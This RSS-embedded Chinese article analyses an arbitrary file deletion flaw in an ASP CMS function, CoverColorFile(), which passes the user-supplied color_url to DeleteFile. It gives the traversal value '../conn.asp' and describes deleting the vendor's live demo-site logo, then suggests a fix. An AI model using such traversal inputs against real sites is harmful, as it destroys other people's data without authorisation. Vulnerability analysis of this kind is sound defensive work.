Nothing<br/><br/>下面我们一起来看看函数CoverColorFile()的代码。<br/><br/>Sub CoverColorFile()<br/><br/>//此函数用于生成图像BMP文件 <br/><br/>　　Dim whichfile, head, Colortxt, i, rline, badwords<br/><br/>　　//注意whichfile变量<br/><br/>Response.Expires = -9999<br/><br/>Response.AddHeader &#34;Pragma&#34;,&#34;no-cache&#34;<br/><br/>Response.AddHeader &#34;cache-ctrol&#34;,&#34;no-cache&#34;<br/><br/>Response.ContentType = &#34;Image/bmp&#34;<br/><br/>//输出图像文件头<br/><br/>head = ChrB(66) &amp; ChrB(77) &amp; ChrB(118) &amp; ChrB(250) &amp; ChrB(1) &amp; ChrB(0) &amp; ChrB(0) &amp; ChrB(0) &amp;_<br/><br/>ChrB(0) &amp; ChrB(0) &amp; ChrB(54) &amp; ChrB(0) &amp; ChrB(0) &amp; ChrB(0) &amp; ChrB(40) &amp; ChrB(0) &amp;_<br/><br/>ChrB(0) &amp; ChrB(0) &amp; ChrB(172) &amp; ChrB(0) &amp; ChrB(0) &amp; ChrB(0) &amp; ChrB(130) &amp; ChrB(0) &amp;_<br/><br/>ChrB(0) &amp; ChrB(0) &amp; ChrB(1) &amp; ChrB(0) &amp; ChrB(24) &amp; ChrB(0) &amp; ChrB(0) &amp; ChrB(0) &amp;_<br/><br/>ChrB(0) &amp; ChrB(0) &amp; ChrB(64) &amp; ChrB(250) &amp; ChrB(1) &amp; ChrB(0) &amp; ChrB(0) &amp; ChrB(0) &amp;_<br/><br/>ChrB(0) &amp; ChrB(0) &amp; ChrB(0) &amp; ChrB(0) &amp; ChrB(0) &amp; ChrB(0) &amp; ChrB(0) &amp; ChrB(0) &amp;_ <br/><br/><br/>ChrB(0) &amp; ChrB(0) &amp; ChrB(0) &amp; ChrB(0) &amp; ChrB(0) &amp; ChrB(0)<br/><br/>　　Response.BinaryWrite head<br/><br/>　　whichfile=trim(request(&#34;color_url&#34;))<br/><br/>　　// whichfile由用户提交的color_url而来<br/><br/>　　Set Colortxt = fso.OpenTextFile(server.mappath(whichfile),1)<br/><br/>　　//以只读方式打开用户提交的变量whichfile，这里取得的是文件<br/><br/>rline = Colortxt.ReadLine //读取文件一行<br/><br/>badwords = split(rline,&#34;|&#34;) //以“|”作分隔<br/><br/>Colortxt.Close<br/><br/>　　fso.del&#101;teFile(server.mappath(whichfile))<br/><br/>　　//这句就是漏洞了，此句的作用是删除文件。由于whichfile由用户提交而来，又没有经过任何安全处理，所以便构成漏洞了。如果我们让 color_url=../conn.asp，那么就直接删除conn.asp文件了，同样，我们可以让color_url为站内任一文件，最后，我们可以删除全站的文件。<br/><br/>for i=0 to UBound(badwords)<br/><br/>Response.BinaryWrite to3(badwords(i))<br/><br/>next<br/><br/>End Sub<br/><br/>有了上面的漏洞，我们就一起去测试一下官方网站，看看是否存在此漏洞吧。打开官方演示网站，如图1所示，我们就以动易的Logo作测试吧。查看其路径，发现在images目录下，名为logo.gif， <br/><br/><br/>现在，我们注册一个用户，然后进入会员中心，在URL处填入：。<br/>成功提交之后，返回到首页，现在我们可以看到，官方仍然存大此重大漏洞。官方logo.gif处变成了一个红叉，说明已被删掉。<br/><br/>解决办法为最好不要从外部接收数据，要么就删除代码：fso.del&#101;teFile(server.mappath(whichfile))<br/><br/>]]></description>
		</item>
		
</channel>
</rss>